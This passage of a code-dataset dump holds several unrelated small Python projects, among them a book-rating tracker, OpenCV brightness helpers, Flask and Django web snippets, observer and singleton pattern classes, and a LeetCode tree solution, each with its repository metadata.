n=len(self.books))\n\t\telse:\n\t\t\treturn \"User {user}, email: {email}, has read {n} books.\".format(user=self.name, email=self.email, n=len(self.books))\n\n\tdef __eq__(self, other):\n\t\treturn self.name == other.name and self.email == other.email\n\n\tdef __ne__(self, other):\n\t\treturn self.name != other.name or self.email != other.email\n\n\tdef read_book(self, book, rating=None):\n\t\tself.books[book] = rating\n\t\tbook.ratings.append(rating)\n\n\tdef get_average_rating(self):\n\t\ttotal = 0\n\t\ti = 0\n\t\tfor value in self.books.values():\n\t\t\tif value:\n\t\t\t\ttotal += value\n\t\t\t\ti += 1\n\t\ttry:\n\t\t\treturn total / i\n\t\texcept ZeroDivisionError:\n\t\t\treturn 0\n\nclass Book(object):\n\tdef __init__(self, title, isbn, price):\n\t\tself.title = title\n\t\tself.isbn = isbn\n\t\tself.price = price\n\t\tself.ratings = []\n\n\tdef get_title(self):\n\t\treturn self.title\n\n\tdef get_isbn(self):\n\t\treturn self.isbn\n\n\tdef set_isbn(self, new_isbn):\n\t\tself.isbn = new_isbn\n\t\tprint(\"The new ISBN is: {0}.\".format(self.isbn))\n\n\tdef add_rating(self, rating):\n\t\tif rating >= 0 and rating <= 4:\n\t\t\tself.ratings.append(rating)\n\t\telse:\n\t\t\tprint(\"Invalid Request\")\n\n\tdef __eq__(self, other_book):\n\t\treturn self.title == other_book.title and self.isbn == other_book.isbn\n\n\tdef __ne__(self, other_book):\n\t\treturn self.title != other_book.title or self.isbn != other_book.isbn\n\n\tdef get_average_rating(self):\n\t\ttotal = 0\n\t\ti = 0\n\t\tfor value in self.ratings:\n\t\t\tif value:\n\t\t\t\ttotal += value\n\t\t\t\ti += 1\n\t\ttry:\n\t\t\treturn total / i\n\t\texcept ZeroDivisionError:\n\t\t\treturn 0\n\n\tdef __repr__(self):\n\t\treturn self.title\n\n\tdef __hash__(self):\n\t\treturn hash((self.title, self.isbn))\n\nclass Fiction(Book):\n\tdef __init__(self, title, author, isbn, price):\n\t\tsuper().__init__(title, isbn, price)\n\t\tself.author = author\n\t\tself.ratings = []\n\n\tdef get_author(self):\n\t\treturn self.author\n\n\tdef __repr__(self):\n\t\treturn \"{title} by {author}\".format(title=self.title, author=self.author)\n\nclass Non_Fiction(Book):\n\tdef __init__(self, title, subject, level, isbn, price):\n\t\tsuper().__init__(title, isbn, price)\n\t\tself.subject = subject\n\t\tself.level = level\n\t\tself.ratings = []\n\n\tdef get_subject(self):\n\t\treturn self.subject\n\n\tdef get_level(self):\n\t\treturn self.level\n\n\tdef __repr__(self):\n\t\treturn \"{title}, a {level} manual on {subject}.\".format(title=self.title, level=self.level, subject=self.subject)\n\nclass TomeRater():\n\tdef __init__(self):\n\t\tself.users = {}\n\t\tself.books = {}\n\t\tself.isbns = {}\n\n\tdef create_book(self, title, isbn, price):\n\t\tif isbn not in self.isbns.values():\t\n\t\t\tnew_book = Book(title, isbn, price)\n\t\t\tself.isbns[title] = isbn\n\t\t\treturn new_book\n\t\telse:\n\t\t\tprint(\"This ISBN code is already being used for the book {title}.\".format(title=title))\n\n\tdef create_novel(self, title, author, isbn, price):\n\t\tif isbn not in self.isbns.values():\t\n\t\t\tnew_novel = Fiction(title, author, isbn, price)\n\t\t\tself.isbns[title] = isbn\n\t\t\treturn new_novel\n\t\telse:\n\t\t\tprint(\"This ISBN code is already being used for the novel {title}.\".format(title=title))\n\n\tdef create_non_fiction(self, title, subject, level, isbn, price):\n\t\tif isbn not in self.isbns.values():\t\n\t\t\tnew_non_fonction = Non_Fiction(title, subject, level, isbn, price)\n\t\t\tself.isbns[title] = isbn\n\t\t\treturn 
new_non_fonction\n\t\telse:\n\t\t\tprint(\"This ISBN code is already being used for the non fiction book {title}.\".format(title=title))\n\n\tdef add_book_to_user(self, book, email, rating=None):\n\t\tuser = self.users.get(email, None)\n\t\tif user:\n\t\t\tuser.read_book(book, rating)\n\t\t\tif book not in self.books:\n\t\t\t\tself.books[book] = 1\n\t\t\telse:\n\t\t\t\tself.books[book] += 1\n\t\telse:\n\t\t\tprint(\"No user with email {0}\".format(email))\n\n\tdef add_user(self, name, email, user_books=None):\n\t\tif email not in self.users:\t\n\t\t\tif \"@\" in email and (\".com\" in email or \".edu\" in email or \".org\" in email):\n\t\t\t\tnew_user = User(name, email)\n\t\t\t\tself.users[email] = new_user\n\t\t\t\tif user_books:\n\t\t\t\t\tfor book in user_books:\n\t\t\t\t\t\tself.add_book_to_user(book, email)\n\t\t\telse:\n\t\t\t\tprint(\"This email is not valid.\")\n\t\telse:\n\t\t\tprint(\"This email is already being used for user {name}.\".format(name=name))\n\n\tdef print_catalog(self):\n\t\tfor key in self.books.keys():\n\t\t\tprint(key)\n\n\tdef print_users(self):\n\t\tfor value in self.users.values():\n\t\t\tprint(value)\n\n\tdef most_read_book(self):\n\t\tread = 0\n\t\tbook = \"\"\n\t\tfor a, b in self.books.items():\n\t\t\tif b > read:\n\t\t\t\tread = b\n\t\t\t\tbook = a\n\t\tif read < 2:\n\t\t\treturn \"{book}, read {read} time.\".format(book=book, read=read)\n\t\telse:\n\t\t\treturn \"{book}, read {read} times.\".format(book=book, read=read)\n\n\tdef highest_rated_book(self):\n\t\thigh = 0\n\t\thigh_book = \"\"\n\t\tfor book in self.books:\n\t\t\tif book.get_average_rating() > high:\n\t\t\t\thigh = book.get_average_rating()\n\t\t\t\thigh_book = book\n\t\treturn \"{book}, rated {high}.\".format(book=high_book, high=high)\n\n\tdef most_positive_user(self):\n\t\thigh = 0\n\t\thigh_user = \"\"\n\t\tfor user in self.users.values():\n\t\t\tif user.get_average_rating() > high:\n\t\t\t\thigh = user.get_average_rating()\n\t\t\t\thigh_user = user\n\t\treturn \"{user}, with an average rating of {high}.\".format(user=high_user.name, high=high)\n\n\tdef most_expensive_book(self):\n\t\thigh = 0\n\t\thigh_book = \"\"\n\t\tfor book in self.books:\n\t\t\tif book.price > high:\n\t\t\t\thigh = book.price\n\t\t\t\thigh_book = book\n\t\treturn \"{b}, which costs {price}$.\".format(b=str(high_book), price=high)\n\n\tdef get_n_most_read_books(self, n):\n\t\tchoices = dict(self.books)\n\t\tread = 0\n\t\tbook = \"\"\n\t\tserie = \"\"\n\t\ti = 0\n\t\twhile n > 0:\n\t\t\tfor key, value in choices.items():\n\t\t\t\tif value > read:\n\t\t\t\t\tread = value\n\t\t\t\t\tbook = key\n\t\t\ttry:\n\t\t\t\tdel choices[book]\n\t\t\texcept KeyError:\n\t\t\t\treturn(\"Not enough books for the number that was input.\")\n\t\t\t\tbreak\t\n\t\t\tn -= 1\n\t\t\ti += 1\n\t\t\tserie += \"{I}: {b}, read {num} times.\".format(I=i, b=str(book), num=read)\n\t\t\tif n != 0:\n\t\t\t\tserie += \"\\n\"\n\t\t\tbook = \"\"\n\t\t\tread = 0\n\t\telse:\n\t\t\treturn serie\n\n\tdef get_n_most_positive_users(self, n):\n\t\tchoices = dict(self.users)\n\t\thigh = 0\n\t\thigh_user = \"\"\n\t\thigh_list = \"\"\n\t\tk = \"\"\n\t\ti = 0\n\t\twhile n > 0:\n\t\t\tfor key, user in choices.items():\n\t\t\t\tif user.get_average_rating() > high:\n\t\t\t\t\thigh = user.get_average_rating()\n\t\t\t\t\thigh_user = user\n\t\t\t\t\tk = key\n\t\t\ttry:\n\t\t\t\tdel choices[k]\t\n\t\t\texcept KeyError:\n\t\t\t\treturn(\"Not enough users for the number that was input.\")\n\t\t\t\tbreak\t\n\t\t\tn -= 1\n\t\t\ti += 1\n\t\t\thigh_list += \"{I}: {user}, with 
an average rating of {high}.\".format(I=i, user=str(high_user.name), high=high)\n\t\t\tif n != 0:\n\t\t\t\thigh_list += \"\\n\"\n\t\t\thigh_user = \"\"\n\t\t\thigh = 0\n\t\telse:\n\t\t\treturn high_list\n\n\tdef get_n_most_expensive_books(self, n):\n\t\tchoices = dict(self.books)\n\t\thigh = 0\n\t\tbook = \"\"\n\t\tbook_list = \"\"\n\t\tk = \"\"\n\t\ti = 0\n\t\twhile n > 0:\n\t\t\tfor key in choices.keys():\n\t\t\t\tif key.price > high:\n\t\t\t\t\thigh = key.price\n\t\t\t\t\tbook = key\n\t\t\ttry:\n\t\t\t\tdel choices[book]\n\t\t\texcept KeyError:\n\t\t\t\treturn(\"Not enough books for the number that was input.\")\n\t\t\t\tbreak\n\t\t\tn -= 1\n\t\t\ti += 1\n\t\t\tbook_list += \"{I}: {b}, which costs {price}$.\".format(I=i, b=str(book), price=high)\n\t\t\tif n != 0:\n\t\t\t\tbook_list += \"\\n\"\n\t\t\tbook = \"\"\n\t\t\thigh = 0\n\t\telse:\n\t\t\treturn book_list\n\n\tdef get_worth_of_user(self, user_email):\n\t\tu = self.users[user_email]\n\t\ttotal = 0\n\t\tfor book in u.books.keys():\n\t\t\ttotal += book.price\n\t\treturn \"{name} has {p}$ worth of books in his account.\".format(name=u.name, p=round(total, 2))\n\n\tdef __repr__(self):\n\t\tu = \"\"\n\t\tfor user in self.users.values():\n\t\t\tu += str(user)\n\t\t\tu += \"\\n\"\n\t\tb = \"\"\n\t\tfor book in self.books.keys():\n\t\t\tb += str(book)\n\t\t\tb += \"\\n\"\n\t\treturn \"Users:\\n{users}\\nBooks:\\n{books}\".format(users=u, books=b)\n\n\tdef __eq__(self, other):\n\t\treturn self.users == other.users and self.books == other.books\n\n\tdef __ne__(self, other):\n\t\treturn self.users != other.users or self.books != other.books\n\n\n\n\n\n","repo_name":"MaxDude132/pwp-capstones","sub_path":"TomeRater/TomeRater.py","file_name":"TomeRater.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7804729092","text":"import os\nimport cv2\n\nimg_height = 512\nimg_width = 512\n\n\ndef change_brightness(img, value=30):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n v = cv2.add(v, value)\n v[v > 255] = 255\n v[v < 0] = 0\n final_hsv = cv2.merge((h, s, v))\n img = cv2.cvtColor(final_hsv, cv2.COLOR_HSV2BGR)\n return img\n\n\ndef fast_brightness(input_image, brightness=30):\n \"\"\" input_image: color or grayscale image\n brightness: -255 (all black) to +255 (all white)\n\n returns image of same type as input_image but with\n brightness adjusted\"\"\"\n img = input_image.copy()\n cv2.convertScaleAbs(img, img, 1, brightness)\n return img\n\n\nimage = cv2.imread(\"dataset/001/21.jpg\")\ncv2.imshow(\"Input\", image)\n\nimage1 = change_brightness(image.copy(), -50)\ncv2.imshow(\"Output 1\", image1)\n\nimage2 = fast_brightness(image.copy(), -50)\ncv2.imshow(\"Output fast\", image2)\n\nkey = cv2.waitKey(0) & 0xFF\n","repo_name":"bpawluczuk/object-detection","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71574665699","text":"# -*- coding: utf-8 -*-#\n\n# -------------------------------------------------------------------------------\n# Name: DataFrameExample001\n# Description:\n# Author: orange\n# Date: 2021/6/7\n# -------------------------------------------------------------------------------\n\nfrom pyspark.sql import SparkSession\n\nfrom common.log.logger import Log4j\n\nif __name__ == \"__main__\":\n spark = SparkSession \\\n .builder \\\n .master(\"local[3]\") \\\n 
.appName(\"HelloSparkSQL\") \\\n .getOrCreate()\n\n logger = Log4j(spark)\n\n surveyDF = spark.read \\\n .option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .csv(\"file:///E:\\OpenSource\\GitHub\\pyspark-example\\dataset\\sample.csv\")\n\n surveyDF.createOrReplaceTempView(\"survey_tbl\")\n countDF = spark.sql(\"select Country, count(1) as count from survey_tbl where Age<40 group by Country\")\n\n countDF.show()","repo_name":"lj-michale/pyspark-example","sub_path":"app/pyspark3/learning/dataframe/DataFrameExample001.py","file_name":"DataFrameExample001.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"16461391235","text":"from concurrent.futures import ProcessPoolExecutor as Pool\nfrom typing import Iterable, Iterator, Optional\n\nfrom torch import clamp, log, nn\n\nfrom ..chemprop.data import MoleculeDatapoint, MoleculeDataset\nfrom ..chemprop.features import BatchMolGraph, mol2graph\n\nfrom molpal.models.utils import batches\n\ndef get_loss_func(dataset_type: str,\n uncertainty_method: Optional[str] = None) -> nn.Module:\n \"\"\"Get the loss function corresponding to a given dataset type\n\n Parameters\n ----------\n dataset_type : str\n the type of dataset\n uncertainty_method : Optional[str]\n the uncertainty method being used\n\n Returns\n -------\n loss_function : nn.Module\n a PyTorch loss function\n\n Raises\n ------\n ValueError\n if is dataset_type is neither \"classification\" nor \"regression\"\n \"\"\"\n if dataset_type == 'classification':\n return nn.BCEWithLogitsLoss(reduction='none')\n\n elif dataset_type == 'regression':\n if uncertainty_method == 'mve':\n return negative_log_likelihood\n\n return nn.MSELoss(reduction='none')\n\n raise ValueError(f'Unsupported dataset type: \"{dataset_type}.\"')\n\ndef negative_log_likelihood(pred_mean, pred_var, targets):\n \"\"\"The NLL loss function as defined in:\n Nix, D.; Weigend, A. ICNN’94. 1994; pp 55–60 vol.1\"\"\"\n clamped_var = clamp(pred_var, min=0.00001)\n return (log(clamped_var)/2\n + (pred_mean - targets)**2/(2*clamped_var))\n\ndef batch_graphs(smis: Iterable[str], minibatch_size: int = 50,\n n_workers: int = 1) -> Iterator[BatchMolGraph]:\n \"\"\"Generate BatchMolGraphs from the SMILES strings\n\n Uses parallel processing to buffer a chunk of BatchMolGraphs into memory,\n where the chunksize is equal to the number of workers available. 
Only\n prepares one chunk at a time due to the exceedingly large memory footprint \n of a BatchMolGraph\n\n Parameters\n ----------\n smis : Iterable[str]\n the SMILES strings from which to generate BatchMolGraphs\n minibatch_size : int\n the number of molecular graphs in each BatchMolGraph\n n_workers : int\n the number of workers to parallelize BatchMolGraph preparation over\n \n Yields\n ------\n BatchMolGraph\n a batch of molecular graphs of size \n \"\"\"\n # need a dataset if we're going to use features\n # test_data = MoleculeDataset([\n # MoleculeDatapoint(smiles=smi,) for smi in smis\n # ])\n chunksize = minibatch_size*n_workers\n with Pool(max_workers=n_workers) as pool:\n for chunk_smis in batches(smis, chunksize):\n smis_minibatches = list(batches(chunk_smis, minibatch_size))\n for batch_graph in pool.map(mol2graph, smis_minibatches):\n yield batch_graph\n\n","repo_name":"UnixJunkie/molpal","sub_path":"molpal/models/mpnn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"28237624810","text":"from flask import Flask, request\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/sum', methods=['POST'])\r\ndef calculate_sum():\r\n data = request.get_json()\r\n result = sum(data.values())\r\n return {'sum': result}\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host='0.0.0.0')","repo_name":"StefanRae/dtc-dr","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38333213516","text":"import time\nfrom django.core import urlresolvers\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.cache import patch_vary_headers\nfrom django.utils.http import cookie_date\nfrom models import Game\n\nclass SessionMiddleware(object):\n def get_game(self, request):\n resolver = urlresolvers.RegexURLResolver(r'^/', settings.ROOT_URLCONF)\n view, args, kwargs = resolver.resolve(request.path_info)\n return get_object_or_404(Game, name=kwargs['game_name'])\n \n def get_cookie_name(self, game):\n return 'game_session_%s' % game.id\n \n def get_cookie_path(self, game):\n return '/%s' % game.name\n \n def process_request(self, request):\n request.game = game = self.get_game(request)\n engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])\n session_key = request.GET.get(settings.LOGIN_KEY_NAME, request.COOKIES.get(self.get_cookie_name(game)))\n request.session = engine.SessionStore(session_key)\n \n\n def process_response(self, request, response):\n \"\"\"\n If request.session was modified, or if the configuration is to save the\n session every time, save the changes and set a session cookie.\n \"\"\"\n try:\n accessed = request.session.accessed\n modified = request.session.modified\n logoutflag = request.session.get('logout',False)\n except (AttributeError,KeyError):\n pass\n else:\n if accessed:\n patch_vary_headers(response, ('Cookie',))\n if modified or settings.SESSION_SAVE_EVERY_REQUEST or request.GET.get(settings.LOGIN_KEY_NAME):\n if request.session.get_expire_at_browser_close():\n max_age = None\n expires = None\n else:\n max_age = request.session.get_expiry_age()\n expires_time = time.time() + max_age\n expires = cookie_date(expires_time)\n # Save the session data and refresh the client cookie.\n request.session.save()\n response.set_cookie(self.get_cookie_name(request.game),\n 
request.session.session_key, max_age=None,\n expires=expires, domain=settings.SESSION_COOKIE_DOMAIN,\n path=self.get_cookie_path(request.game),\n secure=settings.SESSION_COOKIE_SECURE or None)\n if logoutflag:\n for game in Game.objects.all():\n response.delete_cookie(self.get_cookie_name(game),path=self.get_cookie_path(game),domain=settings.SESSION_COOKIE_DOMAIN)\n request.session['logout']=False\n request.session.save()\n request.session['LOGOUT']=False\n return response\n","repo_name":"meliascosta/juegosdemente","sub_path":"contributable_games/game_session_middleware.py","file_name":"game_session_middleware.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44616534471","text":"import os.path\n\nimport flask\n\nfrom os import getcwd\nfrom datetime import datetime\nfrom ner import predict_ner\n\nimport logging\n\napp = flask.Flask(__name__)\napp.config['JSON_SORT_KEYS'] = False\n\nlogs_folder_path = os.path.join(getcwd(), 'logs')\nos.makedirs(logs_folder_path, exist_ok=True)\nlog_path = os.path.join(f'{logs_folder_path}', f'{datetime.date(datetime.now())}.log')\nlogging.basicConfig(format=u'%(levelname)-8s [%(asctime)s] %(message)s',\n level=logging.DEBUG,\n filename=log_path,\n filemode='a',\n datefmt='%d-%b-%y %H:%M:%S')\nlogging.getLogger('deeppavlov').setLevel(logging.ERROR)\nlogging.getLogger('tensorflow').setLevel(logging.ERROR)\n\n\n@app.route('/api/extract-personal-data', methods=['GET'])\ndef extract_personal_data() -> flask.Response:\n logging.debug(f'The request was received to search for NER tags.')\n answer = {}\n try:\n request_data = flask.jsonify(flask.request.form).json\n text = request_data.get('text', '')\n if not text:\n answer['message'] = 'The text was not passed to the api method.'\n return flask.make_response(flask.jsonify(answer), 400)\n predicted_ner = predict_ner(text)\n answer['message'] = predicted_ner\n return flask.make_response(flask.jsonify(answer), 200)\n\n except Exception as e:\n logging.exception(e)\n return flask.jsonify(flask.Response(f'Some error occured: {e}', 500))\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"onlycska/depersonalization-of-data","sub_path":"ner_service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34026316467","text":"from __future__ import division, print_function, absolute_import\n\nimport sys\nimport traceback\nfrom abc import ABCMeta, abstractmethod\n\nfrom . import UniqueModule\n\n\nclass Singleton(type):\n \"\"\"\n Metaclass ensuring only one instance of the class exists.\n\n The singleton pattern ensures that a class has only one instance\n and provides a global point of access to that instance.\n\n Methods\n -------\n __call__\n\n Notes\n -----\n To define a class as a singleton include the :data:`__metaclass__`\n directive.\n\n See Also\n --------\n :class:`Borg`\n\n Examples\n --------\n Define a singleton class:\n\n >>> from mlpy.modules.patterns import Singleton\n >>> class MyClass(object):\n >>> __metaclass__ = Singleton\n\n .. 
note::\n | Project: Code from `StackOverflow `_.\n | Code author: `theheadofabroom `_\n | License: `CC-Wiki `_\n\n \"\"\"\n _instance = {}\n\n def __call__(cls, *args, **kwargs):\n \"\"\"Returns instance to object.\"\"\"\n if cls not in cls._instance:\n # noinspection PyArgumentList\n cls._instance[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instance[cls]\n\n\nclass Borg(object):\n \"\"\"Class ensuring that all instances share the same state.\n\n The borg design pattern ensures that all instances of a class share\n the same state and provides a global point of access to the shared state.\n\n Rather than enforcing that only ever one instance of a class exists,\n the borg design pattern ensures that all instances share the same state.\n That means every the values of the member variables are the same for every\n instance of the borg class.\n\n The member variables which are to be shared among all instances must be\n declared as class variables.\n\n See Also\n --------\n :class:`Singleton`\n\n Notes\n -----\n One side effect is that if you subclass a borg, the objects all have the\n same state, whereas subclass objects of a singleton have different states.\n\n Examples\n --------\n Create a borg class:\n\n >>> from mlpy.modules.patterns import Borg\n >>> class MyClass(Borg):\n >>> shared_variable = None\n\n .. note::\n | Project: Code from `ActiveState `_.\n | Code author: `Alex Naanou `_\n | License: `CC-Wiki `_\n\n \"\"\"\n _shared_state = {}\n\n def __new__(cls, *p, **k):\n # noinspection PyArgumentList\n self = object.__new__(cls, *p, **k)\n self.__dict__ = cls._shared_state\n return self\n\n\nclass RegistryInterface(type):\n \"\"\"Metaclass registering all subclasses derived from a given class.\n\n The registry interface adds every class derived from a given class\n to its registry dictionary. The `registry` attribute is a class\n variable and can be accessed anywhere. Therefore, this interface can\n be used to find all subclass of a given class.\n\n One use case are factory classes.\n\n Attributes\n ----------\n registry : list\n List of all classes deriving from a registry class.\n\n Methods\n -------\n __init__\n\n Examples\n --------\n Create a registry class:\n\n >>> from mlpy.modules.patterns import RegistryInterface\n >>> class MyRegistryClass(object):\n ... __metaclass__ = RegistryInterface\n\n .. note::\n | Project: Code from `A Primer on Python Metaclasses `_.\n | Code author: `Jake Vanderplas `_\n | License: `CC-Wiki `_\n\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(cls, name, bases, dct):\n \"\"\"Register the deriving class on instantiation.\"\"\"\n if not hasattr(cls, 'registry'):\n cls.registry = {}\n else:\n cls.registry[name.lower()] = cls\n\n super(RegistryInterface, cls).__init__(name, bases, dct)\n\n\nclass Observable(UniqueModule):\n \"\"\"The observable base class.\n\n The observable keeps a record of all listeners and notifies them\n of the events they have subscribed to by calling :meth:`Listener.notify`.\n\n The listeners are notified by calling :meth:`dispatch`. Listeners are notified\n if either the event that is being dispatched is ``None`` or the listener has\n subscribed to a ``None`` event, or the name of the event the listener has subscribed\n to is equal to the name of the dispatching event.\n\n An event is an object consisting of the `source`; i.e. 
the observable, the event\n `name`, and the event `data` to be passed to the listener.\n\n Parameters\n ----------\n mid : str\n The module's unique identifier\n\n Methods\n -------\n dispatch\n load\n save\n subscribe\n unsubscribe\n\n Examples\n --------\n >>> from mlpy.modules.patterns import Observable\n >>>\n >>> class MyObservable(Observable):\n >>> pass\n >>>\n >>> o = MyObservable()\n\n This defines the observable `MyObservable` and creates\n an instance of it.\n\n >>> from mlpy.modules.patterns import Listener\n >>>\n >>> class MyListener(Listener):\n >>>\n >>> def notify(self, event):\n >>> print \"I have been notified!\"\n >>>\n >>> l = MyListener(o, \"test\")\n\n This defines the listener `MyListener` that when notified will print\n the same text to the console regardless of which event has been thrown\n (as long as the listener has subscribed to the event). Then an instance\n of MyListener is created that subscribes to the event `test` of `MyObservable`.\n\n When the event `test` is dispatched by the observable, the listener is notified\n and the text is printed on the stdout:\n\n >>> o.dispatch(\"test\", **{})\n I have been notified!\n\n \"\"\"\n class Event(object):\n \"\"\"Event being dispatched by the observable.\n\n Parameters\n ----------\n source : Observable\n The observable instance.\n name : str\n The name of the event.\n data : dict\n The information to be send.\n\n \"\"\"\n def __init__(self, source, name, data=None):\n self.source = source\n self.name = name\n self.data = data if data is not None else {}\n\n def __init__(self, mid=None):\n super(Observable, self).__init__(mid)\n\n self._listeners = {}\n\n def subscribe(self, listener, events=None):\n \"\"\"Subscribe to the observable.\n\n Parameters\n ----------\n listener : Listener\n The listener instance.\n events : str or list[str] or tuple[str] or None\n The event names the listener wants to be notified about.\n\n \"\"\"\n if events is not None and not isinstance(events, (list, tuple)):\n events = (events,)\n\n self._listeners[listener] = events\n\n def unsubscribe(self, listener):\n \"\"\"Unsubscribe from the observable.\n\n The listener is removed from the list of listeners.\n\n Parameters\n ----------\n listener : Listener\n The listener instance.\n\n \"\"\"\n del self._listeners[listener]\n\n def dispatch(self, name, **attrs):\n \"\"\"Dispatch the event to all listeners.\n\n Parameters\n ----------\n name : str\n The name of the event to dispatch.\n attrs : dict\n The information send to the listeners.\n\n \"\"\"\n # Create the event to send\n e = Observable.Event(self, name, {k: v for k, v in attrs.iteritems()})\n\n # Notify all listeners of this event\n for listener, events in self._listeners.items():\n if events is None or name is None or name in events:\n try:\n listener.notify(e)\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback)\n sys.exit(1)\n\n\nclass Listener(object):\n \"\"\"The listener interface.\n\n A listener subscribes to an observable identifying the events the listener is\n interested in. 
The observable calls :meth:`notify` to send relevant event information.\n\n Parameters\n ----------\n o : Observable, optional\n The observable instance.\n events : str or list[str], optional\n The event names the listener wants to be notified about.\n\n Notes\n -----\n Every class inheriting from Listener must implement :meth:`notify`, which\n defines what to do with the information send by the observable.\n\n Examples\n --------\n >>> from mlpy.modules.patterns import Observable\n >>>\n >>> class MyObservable(Observable):\n >>> pass\n >>>\n >>> o = MyObservable()\n\n This defines the observable `MyObservable` and creates\n an instance of it.\n\n >>> from mlpy.modules.patterns import Listener\n >>>\n >>> class MyListener(Listener):\n >>>\n >>> def notify(self, event):\n >>> print \"I have been notified!\"\n >>>\n >>> l = MyListener(o, \"test\")\n\n This defines the listener `MyListener` that when notified will print\n the same text to the console regardless of which event has been thrown\n (as long as the listener has subscribed to the event). Then an instance\n of MyListener is created that subscribes to the event `test` of `MyObservable`.\n\n When the event `test` is dispatched by the observable, the listener is notified\n and the text is printed on the stdout:\n\n >>> o.dispatch(\"test\", **{})\n I have been notified!\n\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self, o=None, events=None):\n if o is not None:\n o.subscribe(self, events)\n\n @abstractmethod\n def notify(self, event):\n \"\"\"Notification from the observable.\n\n Parameters\n ----------\n event : Observable.Event\n The event object dispatched by the observable consisting of `source`;\n i.e. the observable, the event `name`, and the event `data`.\n\n Raises\n ------\n NotImplementedError\n If the child class does not implement this function.\n\n Notes\n -----\n This is an abstract method and *must* be implemented by its deriving class.\n\n \"\"\"\n raise NotImplementedError\n","repo_name":"evenmarbles/mlpy","sub_path":"mlpy/modules/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":10676,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"7957569510","text":"# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n \n ix_root_val = len(nums) // 2\n root_node = TreeNode(nums[ix_root_val])\n root_node.left = self.sortedArrayToBST(nums[:ix_root_val])\n root_node.right = self.sortedArrayToBST(nums[ix_root_val + 1:])\n return root_node\n\n\nclass Solution2:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n\n root = TreeNode(0)\n node, stack = root, []\n l, r = 0, len(nums)\n\n while l < len(nums):\n while l < r:\n stack.append((node, l, r))\n r = (l + r) // 2\n if l >= r:\n break\n node.left = TreeNode(0)\n node = node.left\n\n node, l, r = stack.pop()\n m = (l + r) // 2\n node.val = nums[m]\n l = m + 1\n if l < r:\n node.right = TreeNode(0)\n node = node.right\n\n return root\n","repo_name":"aBulgakoff/algos","sub_path":"leetcode/tree/108_convert_sorted_arr_to_bst.py","file_name":"108_convert_sorted_arr_to_bst.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32205684118","text":"# 
Exercise 5\r\n\r\n# Create the checkFeb function to check the number of days in February.\r\n\r\ndef checkFeb():\r\n if mois == 2 and jour > 29:\r\n print(\"We are in February. This day cannot exist.\")\r\n quit()\r\n return\r\n\r\n\r\n# Ask the user for the date\r\n\r\njour = int(input(\"Enter the day:\"))\r\nif jour > 31:\r\n print(\"This day does not exist\")\r\n quit()\r\nelif jour < 1:\r\n print(\"This day does not exist\")\r\n quit()\r\n\r\nmois = int(input(\"Enter the month:\"))\r\ncheckFeb()\r\nif mois > 12:\r\n print(\"This month does not exist\")\r\n quit()\r\nelif mois < 1:\r\n print(\"This month does not exist\")\r\n quit()\r\n\r\nannee1 = int(input(\"Enter the year:\"))\r\nannee2 = str(annee1)\r\nif len(annee2) > 4:\r\n print(\"The year format is invalid.\")\r\n quit()\r\n\r\nprint(\"Today is \",jour,\"/\",mois,\"/\",annee2,\".\")\r\n","repo_name":"heyimgab/nsi2021-2022","sub_path":"PYTHON/Programmes/isdatevalid.py","file_name":"isdatevalid.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
